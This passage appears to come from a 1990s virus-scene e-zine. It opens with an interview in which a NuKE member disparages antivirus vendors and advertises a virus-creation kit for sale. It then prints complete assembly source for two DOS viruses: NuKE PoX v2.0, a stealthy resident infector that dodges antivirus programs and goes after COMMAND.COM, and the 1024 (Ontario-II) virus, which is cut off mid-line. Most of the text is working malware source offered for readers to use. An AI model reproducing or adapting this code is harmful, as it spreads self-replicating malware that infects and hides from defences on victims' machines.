helping out the AV community? Nuke > Well, not really, our basic idea is to help YOU, the average computer user that is dumb on computer structures and uses these software packages to only later find out he was raped, raped out of his data and his money. I'll give you an example. F-Prot is heard to be a great anti-viral kit, and that it can stop many viruses at its tracks, unknown and known. Inside the F-Prot kit there is a program called VIRSTOP, it is a TSR program that will check every file you run for infection etc... Now who would expect that VIRSTOP only detects 800 viruses, NOT MORE! And the strings are cheap works that would lose all credit for Frisk and his package if "word got out!" Lemme tell you, the well-known encryption engines like MtE are NOT detected by VIRSTOP! It is not a miss in code, Frisk NEVER put the damn routine inside, it is incapable to detect any polymorphic virus that has infected the system! You have just succeeded into screwing yourself just as McAfee did with SCAN! See, we are here to show you the facts, many people are not able to disassemble and look through the code and find out what the virus package can detect! So we bring this information out to the public, all I say is TRUE and can be backed up with the proof I found inside these AV programs! Barbara> What about the virus writers wanting to cause damage? Nuke > Again that is why we are here, if you produce you a virus that is unbelievable, the advances in the scanners will increase by learning from our viruses, and the chances of a 14-year-old wanting to create a virus for revenge or whatever reason cannot compete with this and their virus become a failure, which is exactly what we want! And we too do not enjoy those "kids" that enjoy damage, we run this organization legally and seriously. If we do find such a user within our circle surely he will be made an example of. Barbara> There has been a group of teenagers in England that were virus writers and called themselves ARCV, they have been arrested as of Feb 8th, 1993 and are going on trail for creating viruses. What do you think of this? Nuke > Yes, ARCV, I knew them well. In this case I CANNOT say that I am happy to see them arrested, you see many of there viruses have been found and related to VCL/MPC generators. See, VCL is a friendly user kit standing for Virus Creation Laboratory, all one has to do is flag on the option he/she would want with his dandy mouse and once done hit compile and the kit will produce you the virus you asked it to do. Now are we going to put some- one on trial for simply using such a program? Are we going to introduce laws that make it illegal to run certain programs in YOUR OWN computer? I find that a laugh! They certainly can not be responsible! Barbara> Then whom are we going to made responsible for these acts? Nuke > Tough question, well I certainly do not believe that ARCV is. I know several whom have used the VCL kit to generate viruses to test how effective their anti-virus program was. This person created the virus, in order to test them, should he be arrested and tried? How do we know if a "bullet-proof" vest can withstand a bullet? Naturally we test it! Also I find you are loosing touch with the real issue! A virus is nothing but a program, it can not be created by itself, it will do exactly what the creator wanted it to do! Nothing more or less. ARCV's virus never contain any DAMAGING CODE, they were viruses with little messages and all... Wouldn't you say the guilty person is the one that intensionally or carelessly created the virus for the produce to cause havoc? The maker of a gun is not responsible for all the murders but those that use it for that intension are. Barbara> You seem to know a lot on what is happening on this topic, may I ask to what organization you belong to? Nuke > Sure, we called ourselves "NuKE" we are an international group, ranging from Canada, USA, Australia, Europe. We are highly organized, much more than what anybody would expect! We monitor the virus and AV scene, not many would know it, but we do. We are the makers of VCL which was the first of its kind, and STILL IS, the ONLY virus kit to fully create your unique virus, many like MPC consist on one virus which is broken up, we provide options as adding you own feature or choose any 24 we have. We will be releasing a VCL v2.0 to be again the FIRST of its kind surpassing anything out there, it may "boggle" the world, but it will set new standards and pave new methods of virus scanning, it will unfortunately kill the little guys, by in this world you have to be very competitive. The VCL kit will perhaps be marketed, if you wish you may even buy an advance copy when it comes out within a month! Barbara> Sounds interesting, what is the price range? Nuke > Humm...I guess 75$-100$ (US) Barbara> I'll leave you my number, +44-XX-XXX-XXXX. Call me when this program is available. Nuke > K0ol...Will do... [Wow a date already?] Barbara> I thank you for you time, and good day. [Mush] Nuke > Okay now taw-taw... [English humour] The NuKE Associates =========================================================================== ;========================================================================== ; ** NuKE Pox v2.0 ** ;This is VERY old code but I promised to give it out, you'll see it exactly ;like Npox v1.1 in IJ#4, The code here is VERY BADLY written, I wrote WHOLE ;procedures TWICE! so LOTS of double code, I leave it UNTOUCHED for you to ;see, and understand it! I don't care if you fuck with it, go for it! ;The method of TSR is old, method of getting the Vectors is bad, the way ;I infect EXEs ain't too hot... But hell it works! It infects overlays.. ;it won't infect F-prot.exe or anything with ????SCAN.EXE like SCAN.EXE or ;TBSCAN.EXE etc... Command.com dies fast... Really neat...Play all you like ; ;And to all those that said I `Hacked' this... ; FFFFFF UU UU CCCC KK KK YY YY OOOO UU UU ; FF UU UU CC CC KK KK YY YY OO OO UU UU ; FFFF UU UU CC KKK === YY OO OO UU UU ; FF UU UU CC CC KK KK YY OO OO UU UU ; FF UUUUUU CCCC KK KK YY OOOO UUUUUU ;Just cuz you can't do it, doesn't mean I can't, anyhow my 93 viruses are ;500% better than this one... ;*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*- ;-* (c) Rock Steady, Viral Developments -* ;*- (c) NuKE Software Developement 1991, 1992 *- ;-* -* ;*- Virus: NuKE PoX Version: 2.0 *- ;-* ~~~~~~ ~~~~~~~~ -* ;*- Notes: EXE & COM & OVL Infector, TSR Virus. Dir Stealth Routine. *- ;-* Will Disinfect files that are opened, and re-infect them -* ;*- when they are closed! Executed files are disinfected then *- ;-* executed, and when terminated reinfected! -* ;*- VERY HARD to stop, it goes for your COMMAND.COM! beware! *- ;-* It is listed as a COMMON Virus due to is stealthiness! -* ;*- Bytes: 1800 Bytes *- ;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-* virus_size equ last - init_virus ;Virus size mut1 equ 3 mut2 equ 1 mut3 equ 103h ;Offset location seg_a segment byte public assume cs:seg_a, ds:seg_a org 100h ;COM file! rocko proc far start: jmp init_virus ;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*- ; Virus Begins Here... ;------------------------------------------------------------------------- init_virus: call doit_now ;Doit VirusMan... doit_now: pop bp ;Not to Lose Track sub bp,106h ;Set our position push ax ;Save all the regesters push bx push cx push dx push si push di push bp push es push ds mov ax,0abcdh ;Are we resident Already? int 21h ;***McAfee Scan String! cmp bx,0abcdh ;Yupe... Quit Then... je exit_com push cs ;Get CS=DS pop ds mov cx,es mov ax,3521h ;Sometimes tend to inter- int 21h ;cept this Interrupt... mov word ptr cs:[int21+2][bp],es ;Save the Int mov word ptr cs:[int21][bp],bx ;Vector Table dec cx ;Get a new Memory block mov es,cx ;Put it Back to ES mov bx,es:mut1 ;Get TOM size mov dx,virus_size ;Virus size in DX mov cl,4 ;Shift 4 bits shr dx,cl ;Fast way to divide by 16 add dx,4 ;add 1 more para segment mov cx,es ;current MCB segment sub bx,dx ;sub virus_size from TOM inc cx ;put back right location mov es,cx mov ah,4ah ;Set_block int 21h jc exit_com mov ah,48h ;now allocate it dec dx ;number of para mov bx,dx ; int 21h jc exit_com dec ax ;get MCB mov es,ax mov cx,8h ;Made DOS the owner of MCB mov es:mut2,cx ;put it... sub ax,0fh ;get TOM mov di,mut3 ;beginnig of our loc in mem mov es,ax ; mov si,bp ;delta pointer add si,offset init_virus ;where to start mov cx,virus_size cld repne movsb ;move us mov ax,2521h ;Restore Int21 with ours mov dx,offset int21_handler ;Where it starts push es pop ds int 21h exit_com: push cs pop ds cmp word ptr cs:[buffer][bp],5A4Dh je exit_exe_file mov bx,offset buffer ;Its a COM file restore add bx,bp ;First three Bytes... mov ax,[bx] ;Mov the Byte to AX mov word ptr ds:[100h],ax ;First two bytes Restored add bx,2 ;Get the next Byte mov al,[bx] ;Move the Byte to AL mov byte ptr ds:[102h],al ;Restore the Last of 3b pop ds pop es pop bp ;Restore Regesters pop di pop si pop dx pop cx pop bx pop ax mov ax,100h ;Jump Back to Beginning push ax ;Restores our IP (a CALL retn ;Saves them, now we changed command db "C:\COMMAND.COM",0 exit_exe_file: mov bx,word ptr cs:[vir_cs][bp] ;fix segment loc mov dx,cs ; sub dx,bx mov ax,dx add ax,word ptr cs:[exe_cs][bp] ;add it to our segs add dx,word ptr cs:[exe_ss][bp] mov bx,word ptr cs:[exe_ip][bp] mov word ptr cs:[fuck_yeah][bp],bx mov word ptr cs:[fuck_yeah+2][bp],ax mov ax,word ptr cs:[exe_ip][bp] mov word ptr cs:[Rock_fix1][bp],dx mov word ptr cs:[Rock_fix2][bp],ax pop ds pop es pop bp pop di pop si pop dx pop cx pop bx pop ax db 0B8h ;nothing but MOV AX,XXXX Rock_Fix1: dw 0 cli mov ss,ax db 0BCh ;nothing but MOV SP,XXXX Rock_Fix2: dw 0 sti db 0EAh ;nothing but JMP XXXX:XXXX Fuck_yeah: dd 0 int21 dd ? ;Our Old Int21 ;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*- ; Dir Handler ;------------------------------------------------------------------------- old_dir: call calldos21 ;get FCB test al,al ;error? jnz old_out ;nope push ax push bx push es mov ah,51h ;get PSP int 21h mov es,bx ; cmp bx,es:[16h] ; jnz not_infected mov bx,dx mov al,[bx] push ax mov ah,2fh int 21h pop ax inc al ;Extended FCB? jnz fcb_okay add bx,7h fcb_okay: mov ax,es:[bx+17h] and ax,1fh cmp al,1eh jnz not_infected and byte ptr es:[bx+17h],0e0h ;fix secs sub word ptr es:[bx+1dh],virus_size sbb word ptr es:[bx+1fh],0 not_infected: pop es pop bx pop ax old_out: iret ;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*- ; Int 21 Handler ;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*- int21_handler: cmp ah,11h je old_dir cmp ah,12h je old_dir cmp ax,4b00h ;File executed je dis_infect cmp ah,3dh je check_file cmp ah,3eh je check_file2 cmp ax,0abcdh ;Virus testing jne int21call mov bx,0abcdh int21call: jmp dword ptr cs:[int21] ;Split... check_file: jmp opening_file ;Like a Charm check_file2: jmp closing_file dis_infect: call disinfect ;EXE & COM okay dont_disinfect: push dx pushf push cs call int21call pop dx execute: push ax push bx push cx push dx push ds push ax push bx push cx push dx push ds push bp push cs pop ds mov dx,offset command mov bp,0abcdh jmp command1 command_ret: pop bp pop ds pop dx pop cx pop bx pop ax call check_4_av jc exit1 command1: mov ax,4300h ;Get file Attribs call calldos21 jc exit1 test cl,1h ;Make sure there normal jz open_file ;Okay there are and cl,0feh ;Nope, Fix them... mov ax,4301h ;Save them now call calldos21 jc exit open_file: mov ax,3D02h call calldos21 exit1: jc exit mov bx,ax ;BX File handler mov ax,5700h ;Get file TIME + DATE Call calldos21 mov al,cl or cl,1fh ;Un mask Seconds dec cx ;60 seconds xor al,cl ;Is it 60 seconds? jz exit ;File already infected push cs pop ds mov word ptr ds:[old_time],cx ;Save Time mov word ptr ds:[old_date],dx ;Save Date mov ah,3Fh mov cx,1Bh ;Read first 1B mov dx,offset ds:[buffer] ;into our Buffer call calldos21 jc exit_now ;Error Split mov ax,4202h ;Move file pointer xor cx,cx ;to EOF File xor dx,dx call calldos21 jc exit_now ;Error Split cmp word ptr ds:[buffer],5A4Dh ;Is file an EXE? je exe_infect ;Infect EXE file mov cx,ax sub cx,3 ;Set the JMP mov word ptr ds:[jump_address+1],cx call infect_me ;Infect! jc exit mov ah,40h ;Write back the mov dx,offset jump_address mov cx,3h call calldos21 exit_now: mov cx,word ptr ds:[old_time] ;Restore old time mov dx,word ptr ds:[old_date] ;Restore Old date mov ax,5701h call calldos21 mov ah,3Eh call calldos21 exit: cmp bp,0abcdh je command2 pop ds pop dx pop cx pop bx pop ax iret command2: jmp command_ret exe_infect: mov cx,word ptr cs:[buffer+20] mov word ptr cs:[exe_ip],cx mov cx,word ptr cs:[buffer+22] mov word ptr cs:[exe_cs],cx mov cx,word ptr cs:[buffer+16] mov word ptr cs:[exe_sp],cx mov cx,word ptr cs:[buffer+14] mov word ptr cs:[exe_ss],cx push ax push dx call multiply sub dx,word ptr cs:[buffer+8] mov word ptr cs:[vir_cs],dx push ax push dx call infect_me pop dx pop ax mov word ptr cs:[buffer+22],dx mov word ptr cs:[buffer+20],ax pop dx pop ax jc exit add ax,virus_size adc dx,0 push ax push dx call multiply sub dx,word ptr cs:[buffer+8] add ax,40h mov word ptr cs:[buffer+14],dx mov word ptr cs:[buffer+16],ax pop dx pop ax push bx push cx mov cl,7 shl dx,cl mov bx,ax mov cl,9 shr bx,cl add dx,bx and ax,1FFh jz outta_here inc dx outta_here: pop cx pop bx mov word ptr cs:[buffer+2],ax mov word ptr cs:[buffer+4],dx mov ah,40h mov dx,offset ds:[buffer] mov cx,20h call calldos21 exit_exe: jmp exit_now rocko endp vir_cs dw 0 exe_ip dw 0 exe_cs dw 0 exe_sp dw 0 exe_ss dw 0 exe_sz dw 0 exe_rm dw 0 ;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*- ; Opening File handle AX=3D ;------------------------------------------------------------------------- opening_file: call check_extension jnc open_fuck2 call check_exten_exe jnc open_fuck2 jmp dword ptr cs:[int21] open_fuck2: push ax mov ax,3d02h call calldos21 jnc open_fuck1 pop ax iret open_fuck1: push bx push cx push dx push ds mov bx,ax mov ax,5700h call calldos21 mov al,cl or cl,1fh dec cx ;60 Seconds xor al,cl jnz opening_exit3 dec cx mov word ptr cs:[old_time],cx mov word ptr cs:[old_date],dx mov ax,4202h ;Yes Pointer to EOF xor cx,cx xor dx,dx call calldos21 mov cx,dx mov dx,ax push cx push dx sub dx,1Bh ;Get first 3 Bytes sbb cx,0 mov ax,4200h call calldos21 push cs pop ds mov ah,3fh ;Read them into Buffer mov cx,1Bh mov dx,offset buffer call calldos21 xor cx,cx ;Goto Beginning of File xor dx,dx mov ax,4200h call calldos21 mov ah,40h ;Write first three bytes mov dx,offset buffer mov cx,1Bh cmp word ptr cs:[buffer],5A4Dh je open_exe_jmp mov cx,3h open_exe_jmp: call calldos21 pop dx ;EOF - Virus_Size pop cx ;to get ORIGINAL File size sub dx,virus_size sbb cx,0 mov ax,4200h call calldos21 mov ah,40h ;Fix Bytes xor cx,cx call calldos21 mov cx,word ptr cs:[old_time] mov dx,word ptr cs:[old_date] mov ax,5701h int 21h mov ah,3eh ;Close File call calldos21 opening_exit3: pop ds pop dx pop cx pop bx pop ax jmp dword ptr cs:[int21] ;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*- ; Closing File Handle INFECT it! ;------------------------------------------------------------------------- closing_file: cmp bx,0h je closing_bye cmp bx,5h ja close_cont closing_bye: jmp dword ptr cs:[int21] close_cont: push ax push bx push cx push dx push di push ds push es push bp push bx mov ax,1220h int 2fh mov ax,1216h mov bl,es:[di] int 2fh pop bx add di,0011h mov byte ptr es:[di-0fh],02h add di,0017h cmp word ptr es:[di],'OC' jne closing_next_try cmp byte ptr es:[di+2h],'M' jne pre_exit jmp closing_cunt3 closing_next_try: cmp word ptr es:[di],'XE' jne pre_exit cmp byte ptr es:[di+2h],'E' jne pre_exit closing_cunt: cmp word ptr es:[di-8],'CS' jnz closing_cunt1 ;SCAN cmp word ptr es:[di-6],'NA' jz pre_exit closing_cunt1: cmp word ptr es:[di-8],'-F' jnz closing_cunt2 ;F-PROT cmp word ptr es:[di-6],'RP' jz pre_exit closing_cunt2: cmp word ptr es:[di-8],'LC' jnz closing_cunt3 cmp word ptr es:[di-6],'AE' ;CLEAN jnz closing_cunt3 pre_exit: jmp closing_nogood closing_cunt3: mov ax,5700h call calldos21 mov al,cl or cl,1fh dec cx ;60 Seconds xor al,cl jz closing_nogood push cs pop ds mov word ptr ds:[old_time],cx mov word ptr ds:[old_date],dx mov ax,4200h xor cx,cx xor dx,dx call calldos21 mov ah,3fh mov cx,1Bh mov dx,offset buffer call calldos21 jc closing_no_good mov ax,4202h xor cx,cx xor dx,dx call calldos21 jc closing_no_good cmp word ptr ds:[buffer],5A4Dh je closing_exe mov cx,ax sub cx,3h mov word ptr ds:[jump_address+1],cx call infect_me jc closing_no_good mov ah,40h mov dx,offset jump_address mov cx,3h call calldos21 closing_no_good: mov cx,word ptr ds:[old_time] mov dx,word ptr ds:[old_date] mov ax,5701h call calldos21 closing_nogood: pop bp pop es pop ds pop di pop dx pop cx pop bx pop ax jmp dword ptr cs:[int21] closing_exe: mov cx,word ptr cs:[buffer+20] mov word ptr cs:[exe_ip],cx mov cx,word ptr cs:[buffer+22] mov word ptr cs:[exe_cs],cx mov cx,word ptr cs:[buffer+16] mov word ptr cs:[exe_sp],cx mov cx,word ptr cs:[buffer+14] mov word ptr cs:[exe_ss],cx push ax push dx call multiply sub dx,word ptr cs:[buffer+8] mov word ptr cs:[vir_cs],dx push ax push dx call infect_me pop dx pop ax mov word ptr cs:[buffer+22],dx mov word ptr cs:[buffer+20],ax pop dx pop ax jc closing_no_good add ax,virus_size adc dx,0 push ax push dx call multiply sub dx,word ptr cs:[buffer+8] add ax,40h mov word ptr cs:[buffer+14],dx mov word ptr cs:[buffer+16],ax pop dx pop ax push bx push cx mov cl,7 shl dx,cl mov bx,ax mov cl,9 shr bx,cl add dx,bx and ax,1FFh jz close_split inc dx close_split: pop cx pop bx mov word ptr cs:[buffer+2],ax mov word ptr cs:[buffer+4],dx mov ah,40h mov dx,offset ds:[buffer] mov cx,20h call calldos21 closing_over: jmp closing_no_good ;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*- ; Infection Routine... ;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*- infect_me proc mov ah,40h mov dx,offset init_virus mov cx,virus_size call calldos21 jc exit_error ;Error Split mov ax,4200h xor cx,cx ;Pointer back to xor dx,dx ;top of file call calldos21 jc exit_error ;Split Dude... clc ;Clear carry flag ret exit_error: stc ;Set carry flag ret infect_me endp ;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*- ; DisInfection Routine for 4B ;------------------------------------------------------------------------- Disinfect PROC push ax push bx ;Save them push cx push dx push ds mov ax,4300h ;Get file Attribs call calldos21 test cl,1h ;Test for Normal Attribs jz okay_dis ;Yes, File can be opened and cl,0feh ;No, Set them to Normal mov ax,4301h ;Save attribs to file call calldos21 jc half_way okay_dis: mov ax,3d02h ;File now can be opened call calldos21 ;Safely jc half_way mov bx,ax ;Put File Handle in BX mov ax,5700h ;Get File Time & Date call calldos21 mov al,cl ;Check to see if infected or cl,1fh ;Unmask Seconds dec cx ;Test to see if 60 seconds xor al,cl jnz half_way ;No, Quit File AIN'T dec cx mov word ptr cs:[old_time],cx mov word ptr cs:[old_date],dx mov ax,4202h ;Yes, file is infected xor cx,cx ;Goto the End of File xor dx,dx call calldos21 push cs pop ds mov cx,dx ;Save Location into mov dx,ax ;CX:DX push cx ;Push them for later use push dx sub dx,1Bh ;Subtract file 1Bh from the sbb cx,0 ;End so you will find the mov ax,4200h ;Original EXE header or call calldos21 ;First 3 bytes for COMs mov ah,3fh ;Read them into Buffer mov cx,1Bh ;Read all of the 1B bytes mov dx,offset buffer ;Put them into our buffer call calldos21 jmp half half_way: jmp end_dis half: xor cx,cx ; xor dx,dx ;Goto the BEGINNING of file mov ax,4200h call calldos21 mov ah,40h ;Write first three bytes mov dx,offset buffer ;from buffer to COM mov cx,1Bh cmp word ptr cs:[buffer],5A4Dh je dis_exe_jmp mov cx,3h dis_exe_jmp: call calldos21 pop dx ;Restore CX:DX which they pop cx ;to the End of FILE sub dx,virus_size ;Remove Virus From the END sbb cx,0 ;of the Orignal File mov ax,4200h ;Get new EOF call calldos21 mov ah,40h ;Write new EOF to File xor cx,cx call calldos21 mov cx,word ptr cs:[old_time] mov dx,word ptr cs:[old_date] mov ax,5701h call calldos21 mov ah,3eh ;Close File call calldos21 end_dis: pop ds pop dx pop cx ;Restore 'em pop bx pop ax ret disinfect ENDP ;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*- ; Check File Extension DS:DX ASCIIZ ;-------------------------------------------------------------------------- Check_extension PROC push si push cx mov si,dx mov cx,256h loop_me: cmp byte ptr ds:[si],2eh je next_ok inc si loop loop_me next_ok: cmp word ptr ds:[si+1],'OC' jne next_1 cmp byte ptr ds:[si+3],'M' je good_file next_1: cmp word ptr ds:[si+1],'oc' jne next_2 cmp byte ptr ds:[si+3],'m' je good_file next_2: pop cx pop si stc ret good_file: pop cx pop si clc ret Check_extension ENDP ;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*- ; Check File Extension DS:DX ASCIIZ ;------------------------------------------------------------------------- Check_exten_exe PROC push si push cx mov si,dx mov cx,256h loop_me_exe: cmp byte ptr ds:[si],2eh je next_ok_exe inc si loop loop_me_exe next_ok_exe: cmp word ptr ds:[si+1],'XE' jne next_1_exe cmp byte ptr ds:[si+3],'E' je good_file_exe next_1_exe: cmp word ptr ds:[si+1],'xe' jne next_2_exe cmp byte ptr ds:[si+3],'e' je good_file_exe next_2_exe: pop cx pop si stc ret good_file_exe: pop cx pop si clc ret Check_exten_exe ENDP ;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*- ; Call Int_21h Okay ;------------------------------------------------------------------------- calldos21 PROC pushf call dword ptr cs:[int21] retn calldos21 ENDP ;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*- ; MultiPly ;-------------------------------------------------------------------------- multiply PROC push bx push cx mov cl,0Ch shl dx,cl xchg bx,ax mov cl,4 shr bx,cl and ax,0Fh add dx,bx pop cx pop bx retn multiply ENDP ;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*- ; Check for AV file... Like SCAN.EXE or F-PROT.EXE ;------------------------------------------------------------------------- Check_4_av PROC push si push cx mov si,dx mov cx,256h av: cmp byte ptr ds:[si],2eh je av1 inc si loop av av1: cmp word ptr ds:[si-2],'NA' jnz av2 cmp word ptr ds:[si-4],'CS' jz fuck_av av2: cmp word ptr ds:[si-2],'NA' jnz av3 cmp word ptr ds:[si-4],'EL' jz fuck_av av3: cmp word ptr ds:[si-2],'TO' jnz not_av cmp word ptr ds:[si-4],'RP' jz fuck_av not_av: pop cx pop si clc ret fuck_av: pop cx pop si stc ret Check_4_av ENDP msg db "NuKE PoX V2.0 - Rock Steady" old_time dw 0 old_date dw 0 file_handle dw 0 jump_address db 0E9h,90h,90h buffer db 90h,0CDh,020h ;\ db 18h DUP (00) ;-Make 1Bh Bytes last: seg_a ends end start ;========================================================================== ;========================================================================= ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ; 1024-SRC Virus (Ontario-II) by Death Angel ; ======== ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ; ;This VIRUS was only written as an experiment to see how far a computer ;virus could go through development. This pariticular virus in its present ;form WILL NOT do any damage to your data or go off bouncing a ball across ;your screen or play Yankee Doddle, IT WILL ONLY infect programs. ; ; Virus Information: ; Hides: In upper RAM, requires 3K of memory. ; Size: 1K (exactly when attached to either EXE or COM files) ; ID: Seconds in date of file is set to 32 (impossible value) ; .COM files, the 4th byte is 'O' ; .EXE files, the stack pointer is 0600h ; ; Cover-Up: If loaded with DEBUG, it will remove itself from memory. ; When doing a DIR, it will cover up the filesize increase. ; ;Notes: Also infects on a file open if the file ends in COM,EXE or OVL ; ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; Stack_Size Equ 512+1 Code Segment Para Public 'CODE' Assume Cs:Code, Ds:Code Org 0000h Jmpfar Macro addr db 0EAh dd addr Endm Callfar Macro addr db 09Ah dd addr Endm Retfar Macro num db 0CAh dw num Endm ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ; Do a loop to decode the rest of the virus. Virus_Begin: V00: Mov Bx, offset V05-V05_Back V04: Mov Cx, offset Start_Code-(offset V05-V05_Back) V01: Mov Al, 00h V02: Add Byte ptr Cs:[Bx], Al V03: Xor Al, 00h Inc Bx Loop V02 ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; V05_Back Equ 0 V05: Sub Bx, offset Start_Code Xchg Ax, Cx Dec Ax Int 21h Or Al, Ah Je Run_Prog Push Ds Xor Di, Di Mov Ds, Di Lds Ax, Dword ptr Ds:[21h*4] Mov Word ptr Cs:[Bx].Saved_21, Ax Mov Word ptr Cs:[Bx].Saved_21+2, Ds Mov Cx, Es Dec Cx Mov Ds, Cx Sub Word ptr Ds:[Di+03h], 3072/16 Mov Ax, Word ptr Ds:[Di+12h] Sub Ax, 3072/16 Mov Word ptr Ds:[Di+12h], Ax Mov Es, Ax Sub Ax, 1000h Mov Word ptr Cs:[Bx+Dos_Seg-2], Ax Push Cs Pop Ds Mov Si, Bx Mov Cx, offset Start_Code Cld Rep Movsb Mov Ds, Cx Cli Mov Word ptr Ds:[21h*4], offset New_21 Mov Word ptr Ds:[21H*4]+2, Es Sti Mov Ax, 4BFFh Push Bx Int 21h Pop Bx Pop Ds Push Ds Pop Es ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; Run_Prog: Lea Si, [Bx].Start_Code Mov Di, 0100h Cmp Bx, Di Jb Run_Exe Run_COM: Push Di Movsw Movsw Ret Run_EXE: Mov Ax, Es Add Ax, 0010h Add Word ptr Cs:[Si+02], Ax Add Word ptr Cs:[Si+04], Ax Cli Mov Sp, Word ptr Cs:[Si+06] Mov Ss, Word ptr Cs:[Si+04] Sti Jmp Dword ptr Cs:[Si+00] ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; Check_Present: Inc Ax Iret New_21: Cmp Ax, 0FFFFh ; Checking if resident ? Je Check_Present Cmp Ah, 4Bh ; Executing a program ? Je Load_Program Cmp Ah, 11h ; Doing a DIR ? Je Find_First Cmp Ah, 12h ; Doing a DIR ? Je Find_Next Cmp Ax, 3D00h ; Opening a file ? Jne Run_21 Call Open_File Run_21: Jmpfar 0 ; Goto vector 21h Saved_21 Equ $-4 ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; Find_First: Find_Next: Push Bp Mov Bp, Sp Cmp Word ptr [Bp+04], 1234h Dos_Seg: Pop Bp Jb Run_21 Call Do_21 Call Save_Regs Mov Ah, 2Fh Call Do_21 Cmp Byte ptr Es:[Bx], 0FFh Je F20 Sub Bx, +7 F20: Mov Al, Byte ptr Es:[Bx].1Eh And Al, 1Fh Cmp Al, 1Fh Jne F00 Mov Dx, Word ptr Es:[Bx].26h Mov Ax, Word ptr Es:[Bx].24h Sub Ax, offset Virus_End Sbb Dx, +00 Or Dx, Dx Jb F00 Mov Word ptr Es:[Bx].26h, Dx Mov Word ptr Es:[Bx].24h, Ax F00: Call Restore_Regs IRet ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; Load_Program: Cmp Al, 01h Je Disinfect_DEBUG Cmp Al, 0FFh Je Infect_COMSPEC Call Infect_File Jmp Run_21 ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; Infect_COMMAND: Push Dx Push Ds Mov Dx, offset Command_File Push Cs Pop Ds Mov Byte ptr Ds:Command_Flag, 0FFh Call Infect_File Pop Ds Pop Dx Iret Infect_COMSPEC: Mov Ah, 51h Call Do_21 Mov Es, Bx Mov Ds, Es:[002Ch] Xor Si, Si Push Cs Pop Es LP00: Mov Di, offset COMSPEC_name Mov Cx, 0004h Rep Cmpsw Jcxz LP20 LP10: Lodsb Or Al, Al Jne LP10 ; Cmp Al, Byte ptr [Si] Cmp Byte ptr [Si], 00 Jne LP00 Jmp Infect_COMMAND LP20: Mov Dx, Si Mov Byte ptr Cs:Command_Flag, 0FFh Call Infect_File IRet ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; Disinfect_DEBUG: Push Es Push Bx Call Do_21 Pop Bx Pop Es Call Save_Regs Jb LP30 Xor Cx, Cx Lds Si, Dword ptr Es:[Bx].12h Push Ds Push Si Mov Di, 0100h Cmp Si, Di Jl DI00 Ja LP31 Lodsb Cmp Al, 0E9h Jne LP31 Lodsw Push Ax Lodsb Cmp Al, 'O' Pop Si Jne LP31 Add Si, 103h Inc Cx Inc Cx Pop Ax Push Si Push Ds Pop Es Jmp short DI10 DI00: Lea Di, Dword ptr [Bx].0Eh Cmp Word ptr Es:[Di].00h, offset Virus_End+Stack_Size-2 Jne LP31 ; Note 4B01/decrements stack by 2 DI10: Lodsb Cmp Al, 0BBh Jne LP31 Lodsw Push Ax Lodsw Cmp Ax, Word ptr Cs:[V04] Pop Si Jne LP31 Add Si, offset 